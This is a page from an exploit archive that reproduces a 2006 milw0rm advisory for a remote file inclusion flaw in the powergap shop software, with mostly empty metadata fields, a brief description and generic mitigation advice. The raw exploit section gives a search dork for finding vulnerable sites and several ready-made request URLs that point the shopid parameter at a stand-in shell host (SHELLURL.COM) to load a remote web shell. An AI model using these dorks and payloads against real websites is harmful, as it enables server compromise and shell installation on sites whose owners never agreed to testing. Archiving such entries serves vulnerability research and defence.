powergap - exploit.company

vendor:

powergap

by:

Saudi Hackrz

N/A

CVSS

N/A

Remote File Inclusion

CWE

Product Name: powergap

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

powergap <= (s0x.php) Remote File Inclusion Exploit

powergap <= (s0x.php) Remote File Inclusion Exploit is a vulnerability that allows an attacker to include a remote file, usually through a script on the web server. This vulnerability can be exploited by malicious people to bypass access controls, and potentially disclose sensitive information or exploit vulnerabilities in the remote file.

Mitigation:

To mitigate this vulnerability, the web application should validate user input and filter out any malicious code. Additionally, the web application should be configured to prevent remote file inclusion.

Source

Exploit-DB raw data:

#=================================================================
#powergap <= (s0x.php) Remote File Inclusion Exploit
#================================================================
#                                                                   
#Critical Level : Dangerous                                 
#                                                                   
#Venedor site : http://www.powergap-shop.de   
#                                                                   
#http://www.demo-shop.com                           
#                                                                   
#=================================================================
#
#Dork: "powergap" or "s04.php" or s01.php or s02.php
#
#=================================================================
#Bug in : s01.php
#or s02.php
#or s03.php
#or s04.php
#
#
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/s01.php?shopid=http://SHELLURL.COM?
#http://sitename.com/s01.php?shopid=http://SHELLURL.COM?
#http://sitename.com/s02.php?shopid=http://SHELLURL.COM?
#http://sitename.com/s03.php?shopid=http://SHELLURL.COM?
#http://sitename.com/s04.php?shopid==http://SHELLURL.COM
#   or
#http://sitename.com/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://SHELLURL.COM
#http://sitename.com/sid=http://SHELLURL.COM
#===============================================================================
#Discoverd By : Saudi Hackrz
#
#Conatact : Saudi.unix[at]hotmail.com
#
#GreetZ : SnIpEr_Sa. Alarraab. SHiKaA. King18
#www.3asfh.net
=================================================================

# milw0rm.com [2006-08-17]